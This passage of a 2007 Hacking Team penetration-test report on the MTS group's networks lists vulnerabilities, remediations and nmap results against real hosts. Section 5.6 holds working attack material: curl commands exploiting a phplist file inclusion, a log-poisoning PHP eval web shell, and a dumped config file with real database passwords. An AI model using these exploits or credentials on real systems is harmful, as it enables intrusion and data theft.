topology and configuration. The large list of tools used includes, but is not limited to, whois, traceroute,
hping, etc.
Network mapping tools: they perform network scans of either single hosts or whole networks with the
goal to identify the type and version of the OS running on each system, the open and closed ports and the
type and version of the services or applications listening on each of the discovered open port. In this
assessment the main tool used was nmap.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 21 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
False positive screening
Active systemidentification
Information discovery
Evidences gathering
Vulnerabilitiesidentification
Network discovery
Active services identification
Exploiting
Vulnerability remedies
Web server testing tool: they make several tests at the HTTP protocol level with the goal to identify
different kinds of security issues due to the target web server or its applications. Most of the tests done in
this assessment include manual review of the code of the application PHPlist and small tools like nikto,
curl.
Brute force attack tools: this family of programs automatically tests user accounts againsts predefined
password lists (dictionary attack) or try every possible password (bruteforce). The most common ones
are hydra, lcp, l0phtcrack and the rainbow tables.
Forensic tools: these programs are usually used to figure out possible vulnerabilities when dealing with
huge amounts of data. In this case the most used tools were pwdump, pwhist and cachedump.
Exploiting tools: these tools are used to actually penetrate into a system after a vulnerabilty has been
identified. The most famous framework is Metasploit and it has been used during the assessment. Other
exploits have been used as well.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 22 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4 Discovered vulnerabilities
4.1 V1 – Null sessions
4.1.1 Description
CVE: n/a
NULL sessions take advantage of “features” in the SMB (Server Message Block) protocol that exist
primarily for trust relationships. A NULL session with a Windows host can be established by logging on with
a NULL user name and password. Using these NULL connections will allow to gather the following
information from the host:
• List of users and groups
• List of machines
• List of shares
• Users and host SID (Security Identifiers)
NULL sessions exist in windows networking to allow:
• Trusted domains to enumerate resources
• Computers outside the domain to authenticate and enumerate users
• The SYSTEM account to authenticate and enumerate resources
NetBIOS NULL sessions are enabled by default in Windows NT and 2000. Windows XP and 2003 will allow
anonymous enumeration of shares, but not SAM accounts.
It's not a direct vulnerability but it often allows the attacker to guess and successfully exploit the resources
and information he discovered by using this misconfiguration, especially in case he can enumerate the users
and they have trivial or not existing passwords or there are open shares.
4.1.2 Solution
The first obvious solution consists in installing and/or enabling a firewall on each affected host or server.
Since this is not always possible, there are some registry keys and/or policies which can be changed to
disable Null sessions in each of the different Microsoft operating systems:
Windows XP Home Edition
Note: This also works in Windows 2000 and XP Professional.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 23 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
1. Set the Following Registry Key:
HKLM/System/CurrentControlSet/Control/LSA/RestrictAnonymous=2
2. Reboot to make the changes take effect.
Windows XP Professional Edition and Windows Server 2003
1. Go to Administrative Tools --> Local Security Policy --> Local Policies --> Security Options.
Make sure the following two policies are enabled:
Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled (Default)
Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
This can also be accomplished using the following registry keys:
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=1 (This disallows enumeration
of shares)
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=1 (Default, not allowing
enumeration of user accounts)
2. Reboot to make the changes take effect.
Windows 2000
1. Go to --> Administrative Tools --> Local Security Settings --> Local Policies --> Security Options
2. Select "Additional restrictions of anonymous connections" in the Policy pane on the right
3. From the pull down menu labeled "Local policy setting", select: "No access without explicit
anonymous permissions"
4. Click OK
5. The registry setting equivalent is:
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=2
6. Reboot to make the changes take effect.
Windows NT 4.0 (Service Pack 3 or later)
Set the Following Registry Key:
HKLM/System/CurrentControlSet/Control/LSA/RestrictAnonymous=1
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 24 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4.2 V2 – Missing, weak or default passwords
4.2.1 Description
CVE: n/a
The first thing an attacker will try to exploit, after he identified a system, consists in trying to log on to a
system by using an account with a blank password. To do this he does not even need a tool if the number of
accounts is low.
Viceversa, a tool is needed when he tries to make this process automatic, i.e. when he tries to log on to every
possible account on each identified system looking for one which will give him access without a password.
The same set of tools will often also allow the attacker to test a predefined list of password (dictionary) for
each of the accounts he found, or he guesses they might exist, in the target system.
The word list he uses to attack is generally made of simple words, numbers and the default passwords.
On the Internet there are ready to use lists of default passwords. Such lists contain, for each
system/application/tool/etc. and their respective default users, the vendor default passwords.
Exploiting a system with trivial, null or default password is therefore very easy and does not require high
skills and the risk is obviously high.
4.2.2 Solution
Implement a good password policy and change all default and/or trivially guessable password or replace
them with stronger ones. As a simple advice, a strong password consists in a string of mixed case letters,
numbers, punctuation marks or easy to remember sentences which cannot be found on a dictionary.
A good starting point for building an acceptable password policy can be found on the Sans webstite at the
URL http://www.sans.org/resources/policies/Password_Policy.pdf .
4.3 V3 – Outdated Veritas backup client software
4.3.1 Description
CVE: CVE-2005-0773
A vulnerability present in outdated versions of the Veritas BE backup client software allows an attacker to
remotely gain privileged access on the hosts where it is installed, leading to a full system breach.
A full vendor advisory is available at http://seer.support.veritas.com/docs/276604.htm and patches are
downloadable from the vendor site.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 25 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4.3.2 Solution
Install all the available patches from the vendor, the link to the patches can be found in the vendor's advisory
page at http://seer.support.veritas.com/docs/276604.htm
4.4 V4 – Predictable TCP sequence numbers
4.4.1 Description
CVE: CVE-1999-0077
Some hosts have a TCP/IP stack implementation which uses predictable TCP sequence number generating
algorithms that could allow an attacker to set up connections to other machines with a spoofed source
address of the host affected or to hijack already existing connections to/from this host.
See RFC1948 for the full details.
4.4.2 Solution
Install all the relevant available patches from the OS vendor.
4.5 V5 – Outdated operating system services
4.5.1 Description
CVE: n/a
Running old and unpatched services or software, expecially services exposed to the Internet, makes the
systems vulnerable to existing or unreleased exploit which allow remote attackers to gain full control of the
systems.
Since software (especially the oldest) is hardly bug-less, researchers have found during the last years several
common problems affecting the most widespread services. Such problems can often be remotely exploited
with custom scripts and will lead either to a breach or to a Denial of Service.
4.5.2 Solution
Monitor the security and vendors mailing list looking for advisories concerning the software and services
implemented in the company and install all available patches.
Almost all modern OSes offer the chance to automatically update all the systems with a minimum managing
effort. Having an up-to-date fully patched system will block all the known attacks to its exposed services.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 26 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4.6 V6 – Clear text protocols
4.6.1 Description
CVE: n/a
Compared to other vulnerabilities, plain text communication is often regarded as a much lighter threat and
risk. While cryptographic connections can't completely solve the problem of compromised hosts due to
remote exploits and system misconfiguration, the implementation creates an environment where it is more
difficult to compromise systems by "man in the middle" attacks and sniffed passwords.
Some commonly used services like telnet, ftp, pop3, http and many more do not use cryptography at all.
This lets an attacker, located in the right point of the network, to sniff all the traffic from other users.
This traffic can include sensitive tokens like the credentials used by the users to login or their emails or even
their credit card numbers.
4.6.2 Solution
Replace all clear text protocols with their cryptographic counterparts whenever feasible.
Nowadays there are plenty of cryptographic alternatives to the old plaintext protocol, for example ssh
replaces telnet, ftps replaces ftp, https replaces http and so on.
Unfortunately the “upgrade” is not always easy and simple to do because it involves updating also the clients
used to access such services so the effort for applying the changes is not low.
4.7 V7 – Information disclosure
4.7.1 Description
CVE: n/a
This vulnerability encompasses a broad series of different cases but in each of them an attacker is able to
access some kind of information he should not have access to. It's often a consequence of some other type of
vulnerability. Even the Null session vulnerabilty could be seen as an information disclosure vulnerability
because the data an attacker can access by exploiting it is not something he should have access to. The same
applies to a missing password giving access to an attacker to documents which should have been properly
protected. Another example of this vulnerability is the fact that it's often possible to fecth the last fax
numbers or documents from a LAN connected fax printer. Several documents, mostly configuration files or
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 27 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
backups, have been found on compromised hosts and they often contained passwords (either in clear text or
in cryptographic form).
4.7.2 Solution
The solution to this kind of issues must be reviewed on a case by case basis but generally speaking the
authentication and authorization system should be applied in a sane way or implemented where not existing.
In some other cases, firmware/OS upgrades must be installed to patch the disclosures.
Do not store sensitive data, files, configuration information, passwords and the like on unprotected systems.
4.8 V8 – Denial of Service
4.8.1 Description
CVE: n/a
Denial of Service are mainly just a consequence of other vulnerabilities. In fact, vulnerabilities granting an
attacker access to a system with full privileges over the files and data contained within will allow him to do
whatever he wants in the system, included the ability to delete all data and the OS and force the
administrators to restore the system from scratch, provided they have a working recent backup set.
Some other forms of DoS instead simply consume all the available resources (usually memory, disk space or
network bandwidth) of a system to a point where the system becomes unresponsive or simply stops working.
4.8.2 Solution
The solution to Denial of Service is really a solution of the underlying vulnerabilities allowing an attacker to
gain enough privileges to be able to perform a DoS.
For the other type of DoS, review thoroughly the self written code to remove all memory leaks, implement
disk quotas for the users and set constraints on the network devices on the bandwidth allocated to each user.
4.9 V9 – Credentials reuse
4.9.1 Description
CVE: n/a
This issue relates to the fact that humans tend to use the same credentials, especially passwords, on different
systems.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 28 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The consequence of this is that for an attacker it's enough to break into a system, using a vulnerability of that
system, and discover one password to be automatically able to login on different systems which perhaps are
configured in a strong and secure way and for which there are no known vulnerabilities.
During the assessment it was possible to login to some Oracle database server by using credentials found on
other vulnerable computers.
4.9.2 Solution
The solution is again to implement a good password policy and educate the users to the risks they might be
facing when reusing over and over the same passwords.
4.10 V10 – Privilege escalation
4.10.1 Description
CVE: n/a
Escalating a privilege means that a simple user, by leveraging a local-only vulnerability is able to gain more
privileges than his profile would normally assign to him.
For this reason, when dealing with patches and updates, local buggy services must be upgraded too because
for an attacker they are as important as remote exploits.
4.10.2 Solution
Update all the services, OS, applications, etc. either local-only or Internet exposed.
Check for possible wrong configuration on file authorization attributes so that users of a system don't get
access to sensible data allowing them to gain more privileges.
4.11 V11 – File include vulnerability
4.11.1 Description
CVE: n/a
This vulnerability of the PHPlist open-source newsletter manager, allowed a remote and full compromise of
the www.euromtsindex.com web site running on an outdated Solaris OS. To exploit it, it was necessary to
write some custom code but this allowed to gain full privileges on the server.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 29 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Since software (especially the old one) is hardly bug-less, researchers have found during the last years
several common problems affecting the most widespread services. Such problems can often be remotely
exploited with custom scripts and will lead either to a breach or to a Denial of Service.
4.11.2 Solution
Replace the exploitable version with a patched one or change the newsletter manager application with a
different and more secure one.
4.12 V12 – Dynamic HTML unfiltered parameter
4.12.1 Description
CVE: n/a
A web page contains both text and HTML markup that is generated by the server and interpreted by the
client browser. Web sites that generate only static pages are able to have full control over how the browser
interprets these pages. Web sites that generate dynamic pages do not have complete control over how their
outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into
a dynamic page, neither the web site nor the client has enough information to recognize that this has
happened and take protective actions.
The most widespread use of this vulnerabilities is for XSS (Cross Site Scripting) attacks but it's not the only
one.
Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash
into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data.
The use of XSS might compromise private information, manipulate or steal cookies, create requests that can
be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually
formatted as a hyperlink containing malicious content and which is distributed over any possible means on
the internet.
4.12.2 Solution
Replace or rewrite the dynamic HTML code and functions with code which does proper and strict checking
on the function parameters.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 30 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5 External Perimeter
5.1 Technical summary
The firewalls didn't interfere with the testing activities in the sense that they did not expose extraneous
services to the public internet.
At the time of the test, in one of the external sites, www.euromtsindex.com, is using the last available version
of a PHP application (PHPlist, an open source mailing list manager) which is susceptible to local file
inclusion vulnerability by a specially crafted HTTP query that has been discovered during the source code
auditing.
We managed to convert this local vulnerability into a remote one using a local daemon to write arbitrary
strings on the file system, in this case the Apache www logs.
Once we gained access with a specially crafted PHP shell, we detected a possible telnetd daemon
vulnerability not exploitable from the public Internet (because it's properly firewalled) and we exploited it
(once more with a specially crafted telnetd client written in PHP) from localhost, where the PHP module
runs.
As result of this successful process, not only the Solaris zone hosting the website was compromised but also
the master application server, all the data and other zones hosted on the same server
This gave us full access to many configurations and files containing user names, passwords and database
authentication information.
To sum it up, the internal server hosting the www.euromtsindex.com website was fully remotely
compromised from one of its services exposed to Internet without using any previously known information.
Additionally, this specific application server was mounting some directories on a EMC2 NAS/SAN and we
accessed many of the mounted shares.
We also found a file containing ftp usernames and hashes.
Such password hashes were in a strong Freebsd MD5 format, that cannot be easily recovered except by
bruteforce; by the way a clear text version of these passwords had been previously found on a workstation of
one of the system administrators during the internal penetration test.
All the ftp accounts were then compromised.
The details of the activities are in the next paragraphs.
5.2 Network and services discovery
This is the result of the scan of the public network:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 31 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Interesting ports on www.mtsspa.it (194.185.196.226):
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1863/tcp open unknown
5190/tcp open aol
Interesting ports on catest.mtsspa.it (194.185.196.228):
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1863/tcp open unknown
5190/tcp open aol
Interesting ports on 194.185.196.230:
Not shown: 65518 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp closed https
1863/tcp open unknown
5190/tcp open aol
5931/tcp closed unknown
5932/tcp closed unknown
7550/tcp closed unknown
14001/tcp open unknown
14002/tcp closed unknown
14003/tcp open unknown
14004/tcp closed unknown
14011/tcp closed unknown
14012/tcp open unknown
14029/tcp closed unknown
14089/tcp closed unknown
14101/tcp open unknown
14112/tcp closed unknown
Interesting ports on 194.185.196.231:
Not shown: 65531 filtered ports
PORT STATE SERVICE
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 32 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
80/tcp open http
443/tcp closed https
1863/tcp open unknown
5190/tcp open aol
Interesting ports on 194.185.196.232:
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1863/tcp open unknown
5190/tcp open aol
Interesting ports on 194.185.196.236:
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp closed http
443/tcp open https
1863/tcp open unknown
5190/tcp open aol
Nmap finished: 30 IP addresses (6 hosts up) scanned in 3948.199 seconds
5.3 Localized corporate website - 194.185.196.226
Rating: unsafe
Vulnerabilities found: V12
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Replace or rewrite the dynamic HTML code and functions with code which does proper and strict
checking on the function parameters.
The localized corporate sites are available at the following virtual hosts (vhosts):
http://www.mtsspa.it http://www.euromts-ltd.com http://www.mtsspain.com
http://www.mtsfrance.com http://www.mtsbelgium.com http://www.mtsamsterdam.com
http://www.mtsportugal.com http://www.mtsgermany.com
http://www.mtsdeutschland.com http://www.mtsdeutschland.de
http://www.mtsireland.org http://www.mtsargentina.com
http://www.eurocreditmts.com http://www.mtsspain.com http://www.mtsespana.com
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 33 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
http://www.mtsfinland.com http://www.mtsfinland.net http://www.mtsfinland.org
http://www.mtsassociated.com http://www.mtsassociated.net
http://www.mtsassociated.org http://www.mtsassociatedmarkets.com
http://www.mtsassociatedmarkets.net http://www.mtsassociatedmarkets.org
http://www.mtsam.com http://www.eurobenchmarkbond.com
http://www.eurobenchmarkbond.org http://www.eurobenchmarkbond.net
http://www.benchmark-bond.com http://www.benchmark-bond.org
http://www.benchmark-bond.net http://www.euromtsbenchmark.com
http://www.euromtsbenchmarkbond.com http://www.euro-benchmark.com
http://www.euro-benchmark.net http://www.mtsaustria.com
http://www.mtsaustria.org http://www.mtsaustrianmarket.com
http://www.mtsaustrianmarket.org http://www.mtsaustrianmarket.net
http://www.mtsgreece.com http://www.mtsdenmark.com http://www.neweuromts.com
http://www.neweuromts-ltd.com http://www.mtspoland.com http://www.mtspoland.org
http://www.mtspoland-ceto.com http://www.ceto-mtspoland.com
http://www.mtsdata.com http://www.euroglobalmts.com http://www.mtsisrael.com
http://www.mtsisrael.org http://www.mtsslovenia.com
It's possible to import external contents in the visualized page. This is a client-side attack. It can be abused in
social engineering attacks to steal user information or make information poisoning. Example:
http://www.mtspoland.com/index_dynamic.html?http://www.tin.it/
The above vulnerability can be used to perform pure client side XSS attacks by specifying the javascript:
protocol handler. JavaScript is a powerful client-side language and can be used to perform a large variety of
attacks. Example:
http://www.mtspoland.com/index_dynamic.html?javascript:alert(%22Client%20side%22
);
The affected HTML page is named index_dynamic.html, in bold the vulnerable code:
<html>
<HEAD>
<SCRIPT LANGUAGE="JavaScript">
<!--
var default_page = "#";
var blank = " ";
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 34 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
var content = (location.search) ? location.search.substring(1,
location.search.length) : default_page;
function fillFrame() {
parent.body.location.href = content;
}
-->
</script>
<frameset rows="115,*" framespacing="0" border="0">
<frame src="content/navigation/top.php" name="top" frameborder="no"
scrolling="no" noresize marginwidth="0" marginheight="0" id="top">
<frameset rows="*" cols="180,*" framespacing="0" border="0"
onLoad="fillFrame();">
<frame src="content/navigation/navigation.php" name="nav" frameborder="no"
scrolling="no" marginwidth="0" marginheight="0" id="nav">
<frame src="javascript:parent.blank" name="body" frameborder="no"
scrolling="auto" marginwidth="0" marginheight="0" id="body">
</frameset>
</frameset><noframes></noframes>
</HEAD>
<body>
</body>
</html>
5.4 Corporate website
Rating: unsafe
Vulnerabilities found: V5, V7, V12
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Implement/rewrite the search function with proper parameter checks, limit the search scope,
consider replacing the phpNewsManager software with another product since it seems to be unsupported,
remove also the phpNewsManager test installation
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 35 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The corporate sites are available at the following vhosts:
http://www.mtsgroup.org http://www.mtsmarket.com http://www.mtsmarkets.com
http://www.theeurobondexchange.org http://www.theeurobondexchange.com
http://www.europeanbondexchange.org http://www.europeanbondexchange.com
http://www.europeanbondexchange.net http://www.eurobondexchange.org
http://www.eurobondexchange.com
It's possible to specify a very hight results limit abusing the search function to enumerate local files:
http://www.mtsgroup.org/newcontent/search/search.php?q=a&r=100000
By using the search function, it's possible to read unparsed file contents:
http://www.mtsgroup.org/newcontent/search/search.php?q=mysql&r=100000
phpNewsManager seems an unmantained software, the latest version (1.48) has been released in December
2005:
http://www.mtsgroup.org/newcontent/press/pressmanager/index.php
There are advisories about SQL injection vulnerabilities in this software, see:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-1560
A test instance of phpNewsManager has been found, remove it if it's not being used anymore:
http://www.mtsgroup.org/newcontent/press/pressmanager_test/
5.5 Bondvision website
Rating: safe
Vulnerabilities found: none
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
The corporate sites are available at the following vhosts:
http://www.bondclick.com http://www.bondvision.net http://www.bondvisionusa.com
http://www.bondvisionusa.net
No vulnerabilities have been detected.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 36 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5.6 Euro MTS Index website
Rating: critical
Vulnerabilities found: V5, V6, V7, V10, V11
Risk state: High
Skill level required to exploit the vulnerability: High
Solution: Install all vendor patches, consider replacing clear text protocols (telnet, ftp) with their
cryptographic counterparts (ssh, sftp/ftps), disable phplist and contact the developers (it's an open source
software) for a patch since the vulnerability seems to be currently unknown and therefore unpatched, disable
access to unneeded directories on the web server
The website is available at www.euromtsindex.com and possibly others.
Several directories were found on the server:
http://www.euromtsindex.net/old/
http://www.euromtsindex.net/_notes/
http://www.euromtsindex.net/content/
http://www.euromtsindex.net/TMP2tuxj9lby6.php
A new (unpublished) vulnerability has been detected in the latest version of phplist allowing local file
inclusion. Here it was possible to read the /etc/passwd file:
george@asciinb ~ $ curl
"http://www.euromtsindex.com/phplist/admin/?_ENV%5BCONFIG%5D=/etc/passwd"
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 37 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
idxadmin:x:500:500:MTS Index Web Server
Administrator:/wwwdocs/htdocs:/usr/bin/ksh
mysql:x:101:101:MySQL Administrator:/export/home/mysql:/usr/bin/ksh
The /etc/hosts file:
george@asciinb ~ $ curl
"http://www.euromtsindex.com/phplist/admin/?_ENV%5BCONFIG%5D=/etc/hosts"
#
# Internet host table
#
127.0.0.1 localhost
192.168.253.138 mtsindexws1 loghost
213.92.5.57 mailhost
function ciao() { curl
"http://www.euromtsindex.com/phplist/admin/?cline%5Bc%5D=/tmp/.abracadabra" -d
"mmagic=`php -r "echo base64_encode('echo system(\\"\$1\\");');"`;"; }
Since the above vulnerability can be converted to a remote command execution by finding a daemon that can
write an arbitrary string on the file system (ftp login logs, apache, etc), the following string was injected into
the web server access_log file using a specially crafted HTTP GET query:
<?php error_reporting(E_ALL); echo base64_decode($_POST[mmagic]);
eval(base64_decode($_POST[mmagic])); ?>
This code gave us the chance to run and write the PHP shell to /tmp/.abracadabra with additional features.
The new shell allows command execution in various ways.
Through the PHP shell, it was possible to read various configuration files containing database and applicative
username and passwords, in bold the sensitive data:
<!-- using /tmp/.abracadabra -->
echo system("cat ../config/config.php");<?php
$language_module = "english.inc";
$database_host = "localhost";
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 38 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$database_name = "phplistprod";
$database_user = "phplist";
$database_password = 'Newsl3++3rAdm1n';
$installation_name = 'PHPlist';
$table_prefix = "phplist_";
$usertable_prefix = "phplist_user_";
$pageroot = '/phplist';
$adminpages = '/phplist/admin';
$bounce_protocol = 'pop';
define ("MANUALLY_PROCESS_BOUNCES",1);
$bounce_mailbox_host = 'localhost';
$bounce_mailbox_user = 'popuser';
$bounce_mailbox_password = 'password';
$bounce_mailbox_port = "110/pop3/notls";
$bounce_mailbox = '/var/spool/mail/listbounces';
$bounce_mailbox_purge = 1;
$bounce_mailbox_purge_unprocessed = 1;
$bounce_unsubscribe_threshold = 5;
$require_login = 1;
define("MAXLIST",3);
$commandline_users = array("admin","idxadmin");
define("ASKFORPASSWORD",0);
define("UNSUBSCRIBE_REQUIRES_PASSWORD",0);
define("UNSUBSCRIBE_JUMPOFF",0);
$blacklist_gracetime = 5;
define("CHECK_SESSIONIP",1);
define("ENCRYPTPASSWORD",0);
$check_for_host = 0;
define ("TEST",0);
define ("VERBOSE",0);
define ("WARN_ABOUT_PHP_SETTINGS",1);
define ("MANUALLY_PROCESS_QUEUE",1);
define("WORKAROUND_OUTLOOK_BUG",0);
$userhistory_systeminfo = array(
'HTTP_USER_AGENT',
'HTTP_REFERER',
'REMOTE_ADDR'
);
define('USE_SPAM_BLOCK',1);
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 39 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
define('NOTIFY_SPAM',1);
define ("REGISTER",1);
define("EMAILTEXTCREDITS",0);
define("PAGETEXTCREDITS",0);
define ("NOSTATSCOLLECTION",0);
define ("NUMCRITERIAS",2);
define("ALLOW_NON_LIST_SUBSCRIBE",0);
define("MAILQUEUE_BATCH_SIZE",0);
define("MAILQUEUE_BATCH_PERIOD",3600);
define('MAILQUEUE_THROTTLE',0);
define('DATE_START_YEAR',2003);
define('DATE_END_YEAR',2011);
define('EMPTY_VALUE_PREFIX','--');
define('USE_ADMIN_DETAILS_FOR_MESSAGES',1);
define('SEND_ONE_TESTMAIL',1);
define("USE_LIST_EXCLUDE",0);
define("STACKED_ATTRIBUTE_SELECTION",0);
define('REMOTE_URL_REFETCH_TIMEOUT',3600);
define('MAILQUEUE_AUTOTHROTTLE',0);
define('CLICKTRACK',0);
define('CLICKTRACK_SHOWDETAIL',0);
define('USE_DOMAIN_THROTTLE',0);
define('DOMAIN_BATCH_SIZE',1);
define('DOMAIN_BATCH_PERIOD',120);
define('DOMAIN_AUTO_THROTTLE',0);
define('LANGUAGE_SWITCH',1);
define('USE_ADVANCED_BOUNCEHANDLING',0);
define("HTMLEMAIL_ENCODING","quoted-printable");
define("TEXTEMAIL_ENCODING",'7bit');
define("ENABLE_RSS",0);
define("MANUALLY_PROCESS_RSS",1);
define("USEFCK",1);
define("FCKIMAGES_DIR","uploadimages");
define("USETINYMCEMESG", 0);
define("USETINYMCETEMPL", 0);
define("TINYMCEPATH", "plugins/tiny_mce/tiny_mce.js");
define("TINYMCELANG", "en");
define("TINYMCETHEME", "advanced");
define("TINYMCEOPTS", "");
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 40 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
define("USE_MANUAL_TEXT_PART",0);
define("ALLOW_ATTACHMENTS",1);
define("NUMATTACHMENTS",5);
define("FILESYSTEM_ATTACHMENTS",1);
define("MIMETYPES_FILE","/etc/mime.types");
define("DEFAULT_MIMETYPE","application/octet-stream");
define("PLUGIN_ROOTDIR","/home/me/phplistplugins");
$attachment_repository = '/var/tmp/php/attachments';
$export_mimetype = 'application/csv';
define("EXPORT_EXCEL",0);
define("USE_REPETITION",1);
$repeat_exclude = array(
array("format" => "%a", "values" => array("Sun","Sat")),
array("format" => "%d-%m-%Y","values" => array("26-12-2007","25-12-2007","06-
04-2007","09-04-2007","01-05-2007","01-01-2007")),
);
define("USE_PREPARE",0);
define("PHPMAILER",0);
define("PHPMAILERHOST",'');
$tmpdir = '/tmp';
$database_module = "mysql.inc";
$error_level = error_reporting(0);
?>
Since the Solaris machine seemed outdated and the telnetd service was running, we wrote a non-interactive
telnet client in PHP and ran it with the installed PHP shell.
